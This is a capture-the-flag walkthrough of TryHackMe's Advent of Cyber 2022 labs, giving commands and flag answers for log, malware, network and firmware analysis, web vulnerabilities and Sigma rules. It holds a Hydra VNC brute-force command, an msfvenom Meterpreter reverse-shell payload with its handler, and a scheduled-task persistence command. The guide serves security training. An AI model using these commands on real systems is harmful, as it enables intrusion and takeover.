TryHackMe — Advent of Cyber 2022 — All Challenges Write-ups and Walkthrough with Answers

NIST Cybersecurity Framework : The Cybersecurity Framework (CSF) was developed by the National Institute of Standards and Technology (NIST), and it provides detailed guidance for organizations to manage and reduce cybersecurity risk.

The framework focuses on five essential functions: Identify -> Protect -> Detect -> Respond -> Recover.

With these functions, the framework allows organizations to prioritize their cybersecurity investments and engage in continuous improvement towards a target cybersecurity profile.

Complete the Exercise to get the Flag!!

1. Who is the adversary that attacked Santa’s network this year?

Ans: Answer is in the Below Photo

2. What’s the flag that they left behind?

Ans: THM{IT'S A Y3T1 CHR1$TMA$}

1. Use the ls command to list the files present in the current directory. How many log files are present?

First of all Connect to the Machine or Attack box

Then type ls Command to List the Files and Folders

Ans: 2

2. Elf McSkidy managed to capture the logs generated by the web server. What is the name of this log file?

Ans: webserver.log

3. Begin investigating the log file from question #3 to answer the following questions.

Ans: No Answer Needed

4. On what day was Santa’s naughty and nice list stolen?

Let’s Investigate the File by Grep

cat webserver.log | grep “friday”

Ans: friday

5. What is the IP address of the attacker?

As the Log File Displays the IP of Attacker

Ans: 10.10.249.191

6. What is the name of the important list that the attacker stole from Santa?

cat webserver.log | grep santa

Ans: santaslist.txt

7. Look through the log files for the flag. The format of the flag is: THM{}

grep -r "THM"

Ans: The Answer is in the Above Image

8. Interested in log analysis? We recommend the Windows Event Logs room or the Endpoint Security Monitoring Module.

Ans: No Answer Needed

Before Answering Questions, Lets Enumerate the Machine using nmap

nmap -sC -sV -Pn <Machine_Ip>

1. What is the name of the HTTP server running on the remote host?

Ans : Apache

2. What is the name of the service running on port 22 on the QA server?

Ans : ssh

3. What flag can you find after successfully accessing the Samba service?

Note: SMB or Samba 3.0.20 is potentially vulnerable for Command Execution for default users like root admin and guest.

Open the Attack box, then Files, and Type

smb://<machine-ip>/

Find the Username and Password Here

Ans : Answer is in the Above Image

4. What is the password for the username santahr?

Open the Userlist

Ans : Answer is in the Above Image

Let’s Start the Machine and Enumerate the Machine using nmap

sudo nmap -sS -sV <machine-ip>

1. Use Hydra to find the VNC password of the target with the IP address MACHINE_IP. What is the password?

Let’s use hydra to Crack the Password!!

Hydra is a brute-forcing tool that helps penetration testers and ethical hackers crack the passwords of network services

VNC Servers do not need a Username to Crack with Hydra. So We are giving the Default Password list rockyou.txt and the server address

hydra  -P /usr/share/wordlists/rockyou.txt vnc://<Machine-Ip> -V

Ans: 1q2w3e4r

2. Using a VNC client on the AttackBox, connect to the target of the IP address MACHINE_IP. What is the flag written on the target’s screen?

We found the Password, so let’s try Connecting the Machine with the Password

Open Connections in Linux and Type the IP of the Machine

Enter the Password we found!!

Ans: Flag is in the Above Picture

1. What is the email address of the sender?

Click Split view in the top and open the File in the Machine

Ans: Answer is in the Above image --> (From: )

2. What is the return address?

Ans: Answer is in the Above Image

3. On whose behalf was the email sent?

Answer is in the Above Image

Ans: Chief elf

4. What is the X-spam score?

Answer is in the Above Image

Ans: 3

5. What is hidden in the value of the Message-ID field?

We have to Decode the base64 String

Ans: AoC2022_Email_Analysis

6. Visit the email reputation check website provided in the task.
What is the reputation result of the sender’s email address?

Open the Website emailrep

Ans: Risky

7. Check the attachments. What is the filename of the attachment?

For Further Investigations, I’m Sending the File from Remote machine to my Machine!!

Sender — Remote Machine

Receiver — My Machine

Ans: Answer is in the Above Image (filename: )

8. What is the hash value of the attachment?

Use this Analyser to Analye the .eml File

You will get the Hash

Ans: Answer is in the Above Image

9. Visit the Virus Total website and use the hash value to search.
Navigate to the behavior section.
What is the second tactic marked in the Mitre ATT&CK section?

Open Virustotal and Search for the hash

Ans: Answer is in the Above Image (2nd Subtitle)

10. Visit the InQuest website and use the hash value to search.
What is the subcategory of the file?

Open Inquest and Click Indicator Lookup and Search with the Hash

Ans: Macro_hunter

1. Smart Contracts Last Christmas I gave you my ETH!

Ans: flag{411_ur_37h_15_m1n3}

1. What is the Guard’s flag?

Ans: THM{5_star_Fl4gzzz}

2. What is the Yeti’s flag?

Ans: Answer is in the Video

• Memory forensics is the analysis of the volatile memory that is in use when a computer is powered on.
• Computers use dedicated storage devices called Random Access Memory (RAM) to remember what is being performed on the computer at the time. RAM is extremely quick and is the preferred method of storing and accessing data.

Let’s Use Volatility for the Investigation!!

Volatility is a powerful tool used for analyzing memory dumps on Linux, Mac, and Windows systems.

You can download the Volatility tool Here!!

1. What is the Windows version number that the memory image captured?

Note: this initial scan may take up to 10 minutes to complete. Why not grab some water or stretch your legs?

Scan the Image for Information Gathering Purposes!! By using the Below Command,

python3 vol.py -f workstation.vmem windows.info

The Above scan will provide the basic Details from the Image.

We got the Results!

Ans: 10

2. What is the name of the binary/gift that secret Santa left?

python3 vol.py -f workstation.vmem windows.pslist

The Ps list in volatility is used to Scan and display the Process List from a Memory dump or an Image

Ans: mysterygift.ex

3. What is the Process ID (PID) of this binary?

We Already Exploited the PID in the Above Question!!

Ans: 2040

4. Dump the contents of this binary. How many files are dumped?

Now Lets dump the Files Worked on the PID by Using the Below Command,

python3 vol.py -f workstation.vmem windows.dumpfiles --pid 2040

Ans: 16

Start the Machine and get into it

1. What is the architecture of the malware sample? (32-bit/64-bit)

Let’s Open the File with Detect It Easy

Detect It Easy, or abbreviated “DIE” is a program for determining types of files.

“DIE” is a cross-platform application, apart from Windows version there are also available versions for Linux and Mac OS.

Hence it is a 64-bit Architecture!!!

Ans: 64-bit

2. What is the packer used in the malware sample? (format: lowercase)

Analyze the Image Above Image!

Ans: upx

3. What is the compiler used to build the malware sample? (format: lowercase)

Let’s use capa to Analyse the file

capa detects capabilities in executable files. You run it against a PE, ELF, .NET module, or shellcode file and it tells you what it thinks the program can do. For example, it might suggest that the file is a backdoor, is capable of installing services, or relies on HTTP to communicate.

capa -vv mysterygift

Ans: nim

4. How many MITRE ATT&CK techniques have been discovered attributed to the DISCOVERY tactic?

Ans: 2

5. What is the registry key abused by the malware?

Here we want to open the Process Monitor at the Bottom of the Screen

Add the Process name as mysterygift.exe and click Add

Change the File Extension into exe

Now notice the Process Monitor

We Only need RegCreateKey include the Operation or you can Exclude Unnecessary packages Listed Below,

• RegOpenKey
• RegQueryValue
• RegQueryKey
• RegCloseKey

Right Click and Click Exclude!!

You may observe that only one Registry Key has both RegCreateKey and RegSetValue. This key is related to a persistence technique called Registry Run Key Modification and is commonly used by malware developers to install a backdoor.

Ans: HKCU\Software\Microsoft\Windows\CurrentVersion\Run

6. What is the value written on the registry key based on the previous question?

Double-click the Results we Found

Ans: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wishes.bat

7. What are the names of two files created by the malware under the C:\Users\Administrator\ directory? (format: file1,file2 in alphabetical order)

Click on the Folder Filter at the top right in the Below Image,

Include only the CreateFile Operation

Ans: test.jpg, wishes.bat

8. What are the two domains wherein malware has initiated a network connection? (format: domain1,domain2 in alphabetical order)

Add the Below Filter and Search for the Domain

Here we can see, the 2 Domains in Network Activity are

Ans: bestfestivalcompany.thm, virustotal.com

9. Going back to strings inside the malware sample, what is the complete URL used to download the file hosted in the first domain accessed by the malware?

Use the Below Command on CMD!

cd "Desktop\Malware Sample" 
floss -n 6 mysterygift.exe | grep http://

Or You Can Use Detect It Easy to Find the Strings in the EXE

Ans: http://bestfestivalcompany.thm/favicon.ico

Why Does Packet Analysis Still Matter?

• Network traffic is a pure and rich data source. A Packet Capture (PCAP) of network events provides a rich data source for analysis.
• Capturing live data can be focused on traffic flow, which only provides statistics on the network traffic. On the other hand, identifying and investigating network patterns in-depth is done at the packet level.
• Consequently, threat detection and real-time performance troubleshooting cannot be done without packet analysis.

Tools and Website Used For this Task are!!

1. Wireshark — For Packet Capture and Analysis
2. Cyberchef Online Version — For Defang
3. Virustotal.com — To Analyse Hash

Start your Machine and Navigate into it

1. What is the “Percent Packets” value of the “Hypertext Transfer Protocol”?

View the “Protocol Hierarchy” menu.

Drag and drop the pca file into the Wireshark and Navigate into Statistics →Protocol Hierarchy

Ans:  0.3

2. Which port number has received more than 1000 packets?

As we know TCP has Received more than 1000 Packets

View the “Conversations”

Navigate to Statistics → Conversations and Choose TCP

Ans: 3389

3. What is the service name of the used protocol that received more than 1000 packets?

Ans: RDP

4. What are the domain names?
Enter the domains in alphabetical order and defanged format. (format: domain[.]zzz,domain[.]zzz)

Filter the DNS packets.

Follow the Same for other Packets

The Defanged Url is Below by Cyberchef

Ans: bestfestivalcompany[.]thm,cdn[.]bandityeti[.]thm

5. What are the names of the requested files?
Enter the names in alphabetical order and in defanged format. (format: file.xyz,file.xyz)

Filter the HTTP packets.

Apply the http filter

File in Alphabetical and in Defanged Format (By Cyberchef)

Ans: favicon[.]ico,mysterygift[.]exe

6. Which IP address downloaded the executable file?
Enter your answer in defanged format.

The Source is the Machine Which is the host that Downloads the File in this Case!!

The Below Ip is in Defanged Format!

Ans: 10[.]10[.]29[.]186

7. Which domain address hosts the malicious file?
Enter your answer in defanged format.

Right Click on the Packet that uses GET Request to mysterygift.exe and click Follow → http Stream

Ans: cdn[.]bandityeti[.]thm

8. What is the “user-agent” value used to download the non-executable file?

Right-click on the Packet of Non-executable File and Follow the http stream

Ans: Nim httpclient/1.6.8

9. What is the sha256 hash value of the executable file?

Export objects from the PCAP file.
Calculate the file hashes.

Click File→Export Objects-> HTTP and save the File as it is

Now open Terminal and Type the Command!! (Navigate to the File if Needed)

sha256sum mysterygift.exe

Ans: 0ce160a54d10f8e81448d0360af5c2948ff6a4dbb493fe4be756fc3e2c3f900f

10. What are the connected IP addresses?
Enter the IP addressed defanged and in numerical order. (format: IPADDR,IPADDR)

Search the hash value of the executable file on Virustotal.
Navigate to the “Behaviour” section.
There are multiple IP addresses associated with this file.

Open the Virustotal website and Search for the Hash

Click the Behaviour tab and Scroll below to Find IP

Ip in defanged and Alphabetical Order without Space and We don’t need the 8.8.8.8 — Dns server of Google

The Challenge is Updated, So One More IP is Added with it

Ans: 20[.]99[.]133[.]109,20[.]99[.]184[.]37,23[.]216[.]147[.]64,23[.]216[.]147[.]76

1. What is the office number of Elf Pivot McRed?

As this webpage has an IDOR Vulnerability so, Let’s change the Parameters

Ans: 134

2. Not only profile pages but also stored images are vulnerable. Start with a URL of a valid profile image; what is the hidden flag?

Right Click the Image and Click Open Image in new tab

Change the Image Parameter from 100–107

Ans: THM{CLOSE_THE_DOOR}

Insufficient input validation is one of the biggest security concerns for web applications. The issue occurs when user-provided input is inherently trusted by the application. Since user input can also be controlled by an attacker, we can see how this inherent trust can lead to many problems.

Several web application vulnerabilities, such as SQL Injection, Cross Site Scripting, and Unrestricted File Upload, stem from the issue of insufficient user input validation.

Start the Machine and Paste the IP of the Machine into a Browser!

If Needed, Connect with the TryHackMe’s VPN

1. What is the name given to file uploads that allow threat actors to upload any files that they want?

With unrestricted upload access to a server (and the ability to retrieve data at will), an attacker could deface or otherwise alter existing content — up to and including injecting malicious webpages, which lead to further vulnerabilities such as Cross-Site Scripting (XSS) or Cross-Site Request Forgery (CSRF)

Ans: Unrestricted

2. What is the title of the web application developed by Santa’s freelancer?

Ans: Santasidekick2

3. What is the value of the flag stored in the HR Elf’s Documents directory?

Just Upload a Dummy File!!

cv-username.exe CV file uploaded!! Santa’s team will review your CV and get in touch! Since Santa believes in Strong Security, the file has been stored outside the web root. No unethical elves allowed!

The Above Message ensures that a Person will Review the File, So we can Upload a Payload and wait for the Interaction

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR-MACHINE-IP> LPORT=8080 -f exe -o cv-username.exe

Let’s Start the Reverse Handler!!

sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST <YOUR-MACHINE-IP>; set LPORT 8080; exploit"

Let’s Upload the Payload we Created in Home Directory to the Website and Wait for the Interaction!!

We Got the Reverse Connection!!

Now Let’s Exploit

We are in the system32 Directory so, let’s move back to C: Directory

cd ..
cd .. 
cd Users
cd HR_Elf
cd Documents
cat flag.txt

Ans: THM{Naughty.File.Uploads.Can.Get.You.RCE}

4. What defence technique can be implemented to ensure that specific file types can be uploaded?

To ensure that specific file types can be uploaded, We can verify the file extension. This will allow us to limit the type of files that can be uploaded.

Ans: file Extension validation

5. What defence technique can be used to make sure the threat actor cannot recover their file again by simply using the file name?

Even though our uploads are stored outside the web root, an attacker could leverage an additional vulnerability, such as file inclusion, to execute the file.

To counter these attempts, we can look to rename uploaded files to random names, making it almost impossible for an attacker to recover their file by name

Ans: File Renaming

6. What defence technique can be used to make sure malicious files that can hurt elves are not uploaded?

There is still the risk of an attacker uploading a malicious file that targets the elves that will review the CVs. Since Santa is a high-value individual, some nation-states might even use specialized exploits found in PDF readers to upload a malicious PDF in the hopes of getting access to remove themselves from Santa’s naughty list!

In order to combat these types of malicious files, we can scan uploaded files for malware. We can install a package such as ClamAV and use it to scan the contents of each uploaded file

Ans: Malware Scanning

Open the Link by Adding your Machine IP — http://<Machine-IP>.p.thmlabs.com/

Credentials:

1. What is the value of Flag1?

We can reasonably assume that the website expects an integer id to be sent

To avoid injections, we can convert whatever the user inputs in the id parameter to an integer. So for this purpose, we will be using the intval() function.

This function will take a string and try to convert it into an integer. If no valid integer is found on the string, it will return 0, which is also an integer Let’s Open search-toys.phpand change the Parameters

Change the $_GET['id'] to intval($_GET['id']) Everywhere on the elf.php File

Ans: THM{McCode, Elf McCode}

2. What is the value of Flag2?

First, we will modify our initial query by replacing any parameter with a placeholder indicated with a question mark (?).

This will tell the database we want to run a query that takes two parameters as inputs. The query will then be passed to the mysqli_prepare() function instead of our usual mysqli_query().

mysqli_prepare() will not run the query yet but will indicate to the database to prepare the query with the given syntax. This function will return a prepared statement.

MySQL needs to know the value to put on each placeholder we defined before. So we can use the mysqli_stmt_bind_param() function to attach variables to each placeholder.

This function requires you to send the 2 Function Parameters!!

The first parameter should be a reference to the prepared statement to which to bind the variables.

The second parameter is a string composed of one letter per placeholder to be bound, where letters indicate each variable’s data type. Since we want to pass two strings, we put "ss" in the second parameter, where each “s” represents a string-typed variable. You can also use the letters “i” for integers or “d” for floats

$q = "%".$_GET['q']."%";
$query="select * from toys where name like ? or description like ?";
$stmt = mysqli_prepare($db, $query);
mysqli_stmt_bind_param($stmt, 'ss', $q, $q);
mysqli_stmt_execute($stmt);
$toys_rs=mysqli_stmt_get_result($stmt);

Ans: THM{KodeNRoll}

3. What is the value of Flag3?

We also Have to Change the Parameters here on toys.php

Change the Below Parameter $_GET[‘id’];

To intval($_GET[‘id’]); on Everywhere in the toys.php File

Ans: THM{Are we secure yet?}

4. What is the value of Flag4?

Adding Username, Password parameters with a placeholder indicated with a question mark (?) and the rest of them are same as we did on the 2nd Question, We are Adding the username and password parameter to the mysqli_stmt_bind_param method and Executing it!!

Modify the Above code as Below Code!!

<?php
require_once("connection.php");
session_start();

if(isset($_POST['username']) && isset($_POST['password'])){
$username=$_POST['username'];
$password=$_POST['password'];
$query="select * from users where username=? and password=?";
$stmt = mysqli_prepare($db, $query);
mysqli_stmt_bind_param($stmt, 'ss', $username, $password);
mysqli_stmt_execute($stmt);

$users_rs=mysqli_stmt_get_result($stmt);

Now, Run!!

Ans: THM{SQLi_who???}

HTML5 and Regex

HTML5’s built-in features help a lot with the validation of user-provided input, minimizing the need to rely on JavaScript for the same objective.

The <input> element specifically has an array of very helpful capabilities centered around form validation.

The <input> type, which can be set to specifically filter for an email, a URL, or even a file, among others, promptly checks whether or not the user-provided input fits the type of data that the form is asking for, and so, feedback on its validity is immediately returned to the user as a result.

For even more granular control of the input being provided, regular expressions (regex) can be integrated into the mix. Simply use it in the “pattern” attribute within the <input> element and you’re all set.

Here is a nice resource to get started with regular expressions. A couple of examples are shown below.

1. <input type="text" id="uname" name="uname" pattern="[a-zA-Z0-9]+">
2. <input type="email" id="email" name="email" pattern=".+@0dayinventions\.com">

Start the Machine, Navigate into the RegExPractice Folder and then right -click → Open in Terminal

1. Filtering for Usernames: How many usernames fit the syntax above?

We Have to use the Regular Expressions as per their Structure for Username

9z8yMc9T
31337aq
39C3qxP
R6fUTY2nC8
9Qe5f4
User35
u3Y73h3
5Xze553j

Ans: 8

2. Filtering for Usernames: One username consists of a readable word concatenated with a number. What is it?

Ans: User35

3. Filtering for Emails: How many emails fit the syntax above?

egrep ‘.+@.+\.com’ strings

br33zy@gmail.com
lewisham44@amg.com
johnny.the.sinner@yahoo.com
badyeti@gmail.com
maxximax@fedfull.com
jklabada@tryhackme.com
johnny.the.sinner@yahoo.com
hunter4k@canary.com
hussain.volt@hotmail.com
marckymarc@tryhackme.com
batteryvoltas@alfa.com

Ans: 11

4. Filtering for Emails: How many unique domains are there?

Ans: 8

5. Filtering for Emails: What is the domain of the email with the local-part “lewisham44”?

Ans: amg.com

6. Filtering for Emails: What is the domain of the email with the local-part “maxximax”?

Ans: fedfull.com

7. Filtering for Emails: What is the local-part of the email with the domain name “hotmail.com”?

Ans: hussain.volt

8. Filtering for URLs: How many URLs fit the syntax provided?

egrep '^http(s)?.{3}(www)?.+\..+$' strings

http://www.sample.net/blood?ghost=force
http://keebler.com/dicta-tempore-id-dolores-blanditiis-ut.html
http://koch.com/quae-perspiciatis-non-unde-quo
http://johns.net/nisi-quis-dolorum-et-rerum
https://www.sample.edu/#fire
http://www.sample.info/?mint=trouble&action=move
https://www.sample.org/?quiet=expansion&grip=eggnog
http://spencer.com/sapiente-tempore-omnis-a-est-aut-atque-pariatur
http://pfeffer.biz/nulla-non-facilis-incidunt-necessitatibus-velit-inventore
https://www.kertzmann.com/possimus-ullam-consequatur-itaque-sed-modi-aliquam
https://www.sample.com/?air=color&cave=judge#shake
http://schinner.com/quia-vitae-qui-explicabo-provident-minima-ratione.html
https://runolfsson.com/esse-ab-rerum-et-quis-aut.html
https://www.moen.com/explicabo-exercitationem-culpa-et-eum-temporibus
https://horse.sample.com/shape/company?mom=collar#donkey
http://batz.com/reprehenderit-voluptate-id-soluta-tenetur

Ans: 16

9. Filtering for URLs: How many of these URLs start with “https”?

Count the Number of URLs starts with https

Ans: 7

Cyber threats and criminals have advanced tactics to ensure that they steal information and cause havoc. As you have already seen through the previous days, there are many ways in which this can be done.

There are also ways for security teams to prepare their defences and identify these threats. What would be evident is that most of the blue-team activities will require proactive approaches to analysing different logs, malware and network traffic. This brings about the practice of threat detection.

Open the Machine’s IP Address in a Browser (Make sure you Connected with TryHackMe’s VPN)

1. What is the Challenge #1 flag?

Account Creation Technique Requires

• EventID: 4720
• Service: Security

title: Local Account Creation
id: 1
status: experimental # test, stable, deprecated, unsupported.
description:
author:
date:
modified: 1

logsource: 
product: windows 
service: security
category: # firewall, web, antivirus, process_creation, network_connection, file_access.
detection:
selection:
EventID: 4720  condition: selection # Action to be taken. Can use condition operators such as OR, AND, NOT when using multiple search identifiers.falsepositives: # Legitimate services or use.level: lowtags: # Associated TTPs from MITRE ATT&CK
- {attack.tactic} # MITRE Tactic
- {attack.technique} # MITRE Technique

Ans: THM{n0t_just_your_u$ser}

2. From the Challenge 1 log, what user account was created?

Click on the View Log button and search for user Account

Ans: BanditYetiMini

3. What is the Challenge #2 flag?

We Have to Create a new Rule for Software Discovery and it Requires

• Category: Process Creation
• EventID: 1
• Service: Sysmon
• Image: C:\Windows\System32\reg.exe
• CommandLine: reg query “HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer” /v svcVersion

title:
id: # UUID
status: # experimental, test, stable, deprecated, unsupported.
description:
author:
date:
modified:

logsource:
product: windows
service: sysmon
category: process_creation
detection:
selection:
EventID:
- 1
Image|endswith:
- reg.exe
CommandLine|contains|all:
- reg
- query
- /v
- svcVersion  condition: selection # Action to be taken. Can use condition operators such as OR, AND, NOT when using multiple search identifiers.falsepositives: # Legitimate services or use.level:  # informational, low, medium, high or critical.tags: # Associated TTPs from MITRE ATT&CK
- {attack.tactic} # MITRE Tactic
- {attack.technique} # MITRE Technique

Ans: THM{wh@t_1s_Runn1ng_H3r3}

4. What was the User’s path in the Challenge #2 log file?

open the Log file so we can get the Path of USER

Ans: SIGMA_AOC2022\Bandit Yeti

5. What is the Challenge #3 flag?

Let’s Create a Rule for Scheduled Task and it Requires

• Category: Process Creation
• EventID: 1
• Service: Sysmon
• Image: C:\Windows\System32\schtasks.exe
• Parent Image: C:\Windows\System32\cmd.exe
• CommandLine: schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"

title:
id: # UUID
status: # experimental, test, stable, deprecated, unsupported.
description:
author:
date:
modified:

logsource: 
product: windows
service: sysmon
category: process_creation
detection:
selection:
EventID: 1
Image|endswith:
- schtasks.exe
CommandLine|contains|all:
- schtasks
- /create   condition: selection # Action to be taken. Can use condition operators such as OR, AND, NOT when using multiple search identifiers.falsepositives: # Legitimate services or use.level:  # informational, low, medium, high or critical.tags: # Associated TTPs from MITRE ATT&CK
- {attack.tactic} # MITRE Tactic
- {attack.technique} # MITRE Technique

Ans: THM{sch3dule_0npo1nt_101}

6. What was the MD5 hash associated with Challenge #3 logs?

Open the Log file for Hashes

Ans: 2F6CE97FAF2D5EEA919E4393BDD416A7

Let’s enter the world of 0s and 1s. This then begs the question, how does hardware take electricity and generate signals? In this task, we will focus on digital communication.

For hardware communication, we use a device called a Logic Analyser to analyse the signals. This device can be connected to the actual electrical wires that are used for communication between two devices that will capture and interpret the signals being sent.

USART

Universal Synchronous/Asynchronous Receiver-Transmitter (USART) communication, or as it is better known, serial communication, is a protocol that uses two wires.

One wire is used to transmit (TX) data from device A to device B, and the other wire is used to receive (RX) data on device A from device B. In essence, we connect the transmit port from one device to the receive port from the other device and vice versa.

SPI

The Serial Peripheral Interface (SPI) communication protocol is mainly used for communication between microprocessors and small peripherals such as a sensor or an SD card.

While USART communication has the clock built into the TX and RX lines, SPI uses a separate clock wire. Separating the clock (SCK) from the data (DATA) line allows for synchronous communication, which is faster and more reliable.

I2C

The Inter-Integrated Circuit (I2C) communication protocol was created to deal with the drawbacks of both the USART and SPI communication protocols. Because USART is asynchronous and has the clock built into the transmit and receive lines, devices have to agree ahead of time on the configuration of communication.

Furthermore, speeds are reduced to ensure communication remains reliable.

On the other hand, while SPI is faster and more reliable, it requires many more wires for communication, and every single additional peripheral requires one more Chip Select wire.

1. What device can be used to probe the signals being sent on electrical wires between two devices?

For hardware communication, we use a device called a Logic Analyser to analyze the signals.

This device can be connected to the actual electrical wires that are used for communication between two devices that will capture and interpret the signals being sent.

Ans: logic analyser

2. USART is faster than SPI for communication? (Yea,Nay)

USART communication has the clock built into the TX and RX lines, But SPI uses a separate clock wire.

Separating the clock (SCK) from the data (DATA) line allows for synchronous communication, which is faster and more reliable. So the trade-off is adding an additional wire, but we gain a speed and reliability boost.

Ans: Nay

3. USART communication uses fewer wires than SPI? (Yea,Nay)

Universal Synchronous/Asynchronous Receiver-Transmitter (USART) communication, or as it is better known, serial communication, is a protocol that uses two wires.

One wire is used to transmit (TX) data from device A to device B, and the other wire is used to receive (RX) data on device A from device B

Ans: Yea

4. USART is faster than I2C for communication? (Yea,Nay)

The Inter-Integrated Circuit (I2C) communication protocol was created to deal with the drawbacks of both the USART and SPI communication protocols.

Because USART is asynchronous and has the clock built into the transmit and receive lines, devices have to agree ahead of time on the configuration of communication.

Furthermore, speeds are reduced to ensure communication remains reliable.

Ans: Nay

5. I2C uses more wires than SPI for communication? (Yea,Nay)

SPI is faster and more reliable, it requires many more wires for communication, and every single additional peripheral requires one more Chip Select wire.

I2C attempts to solve these problems. Similar to USART, I2C only makes use of two lines for communication. I2C uses a Serial Data (SDA) line and Serial Clock (SCL) line for communication.

Ans: Nay

6. SPI is faster than I2C for communication? (Yea,Nay)

SPI is Faster and more reliable than I2C

Ans: Yea

7. What is the maximum number of devices that can be connected on a single pair of I2C lines?

An external clock line is used, communication is still faster and more reliable than USART, and while it is slightly slower than SPI, the use of the Address signal means up to 1008 devices can be connected to the same two lines and will be able to communicate.

Ans: 1008

8. What is the new baud rate that is negotiated between the microprocessor and ESP32 chip?

Open the Remote Machine’s Split View

Open the Logic 2.4.2 Application and open the Capture — santa

Click the Analyzers and add an Async Serial Analyser and Give Input Channel as Channel 1 and Baud/Bit rate as 4800

Ans: 9600

9. What is the flag that is transmitted once the new baud rate was accepted?

Add Another Async serial Analyser and Give Input channel as Channel 0 and Baud/Bit Rate as 9600

Ans: THM{Hacking.Hardware.Is.Fun}

What is Firmware Reverse Engineering?

Every embedded system, such as cameras, routers, smart watches etc., has pre-installed firmware, which has its own set of instructions running on the hardware’s processor.

It enables the hardware to communicate with other software running on the device. The firmware provides low-level control for the designer/developer to make changes at the root level.

Firmware Reversing Steps

• The firmware is first obtained from the vendor’s website or extracted from the device to perform the analysis.
• The obtained/extracted firmware, usually a binary file, is first analyzed to figure out its type (bare metal or OS based).
• It is verified that the firmware is either encrypted or packed. The encrypted firmware is more challenging to analyze as it usually needs a tricky workaround, such as reversing the previous non-encrypted releases of the firmware or performing hardware attacks like Side Channel Attacks (SCA) to fetch the encryption keys.
• Once the encrypted firmware is decrypted, different techniques and tools are used to perform reverse engineering based on type.

BinWalk: A firmware extraction tool that extracts code snippets inside any binary by searching for signatures against many standard binary file formats like zip, tar, exe, ELF, etc.

Binwalk has a database of binary header signatures against which the signature match is performed.

The common objective of using this tool is to extract a file system like Squashfs, yaffs2, Cramfs, ext*fs, jffs2, etc., which is embedded in the firmware binary. The file system has all the application code that will be running on the device.

Open the Machine’s Split View

1. What is the flag value after reversing the file firmwarev2.2-encrypted.gpg?

cd bin
binwalk -E -N firmwarev2.2-encrypted.gpg

cd ..
cd bin-unsigned/
extract-firmware.sh firmwarev1.0-unsigned

Password: Santa1010

grep -ir paraphrase
cat fmk/rootfs/gpg/secret.txt

Paraphrase : Santa@2022

gpg — import fmk/rootfs/gpg/private.key

Type the Paraphrase that we Found

gpg --import fmk/rootfs/gpg/public.key 
gpg --list-secret-keys

Once the keys are imported, McSkidy decrypts the firmware using the gpg command. Again change the directory by entering the command cd .. and then cd bin

cd ..
cd bin
gpg firmwarev2.2-encrypted.gpg
cat ~/bin/fmk/rootfs/flag.txt

Ans: THM{WE_GOT_THE_FIRMWARE_CODE}

2. What is the Paraphrase value for the binary firmwarev1.0_unsigned?

Ans: Santa@2022

3. After reversing the encrypted firmware, can you find the build number for rootfs?

Use the Command below to find the Firmware of rootfs

Make Sure, you are in the rootfs Directory

ls -lah * | grep rootfs

Ans: 2.6.31

Use AttackBox for Exploitation

First of All, Let’s Perform a Nmap Scan

nmap -p- 10.10.150.215 -vv -sV -sC --min-rate 1500

Output:

┌──(cyberw1ng㉿root)-[~]
└─$ nmap -p- 10.10.150.215 -vv -sV -sC --min-rate 1500

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-21 11:06 IST
Scanning 10.10.150.215 [2 ports]
Scanning 10.10.150.215 (10.10.150.215) [65535 ports]#Discovered open port 22/tcp on 10.10.150.215
#Discovered open port 80/tcp on 10.10.150.215
#Discovered open port 1883/tcp on 10.10.150.215Not shown: 65532 closed tcp ports (conn-refused)PORT     STATE SERVICE                 REASON  VERSION
22/tcp   open  ssh                     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 17e553cf2a0ebe5b6af0233dacdc07f3 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCv6o9FZFxN/PUlNXGXBJ0QWwpolESTvkSYxvDR9yW3p1K2KVAY4VEeqawoFSIGm3+chCvQk2q/e7FE5LA6yuXFsXEyPbN0lerQBwTVwVTTn6CCjTeEC/EUpsV+J1/LDeidajS9vBW5oXeWzysZ2fy8TH3xwlakFP/cFv9Tc5WwreH5IOi6qwPh9x3h/6wft8mNbBKczaFW9mQPEIaoMhSwKKeNJSJYF/EvJMp/TFdojKZYzeDnuYfU0n0ZWA/gHtX0MA2yJaYwTohbUxgNrFpV8Ev1iqxCI5Gethg8e9muEMSjvGF+kib3D9o78K3Dka6s76TlHy8AacJoz7DPQbIiXdGL2ZskWv+Kye+W0vqJTAxhxGQfWFCzCAPwv3PqcHHqDIXQY8dHy9MwUrK48wNON69KJFreklYtwatJdJtlJLpONtPqRHD0h6dVYx7L4GX4++E56pm6nX4IeEOsJflKPPJIDYGBl3E4+Zo5r9C6lZnE/ZOsKq+MkU1XeFe15TU=
|   256 032ef2d20c95e3d97eeca0aa7ba16cd0 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIdK3mhrZdHxEouf+P+8jbtteJBj0tnC33tj74GD5/YfMY2nHXbSkW+UPQZFU8ZtZ3uK9PziLvm4YAg6ufyBhFs=
|   256 2e90c7317e62d51e89f1544597290ad6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIM8v/s/JZbJOpNarVPoCrl1flxQML3GP5VXhkyy94Y67
80/tcp   open  http                    syn-ack WebSockify Python/3.8.10
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 405 Method Not Allowed
|     Server: WebSockify Python/3.8.10
|     Date: Thu, 22 Dec 2022 05:37:24 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 472
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 405</p>
|     <p>Message: Method Not Allowed.</p>
|     <p>Error code explanation: 405 - Specified method is invalid for this resource.</p>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 501 Unsupported method ('OPTIONS')
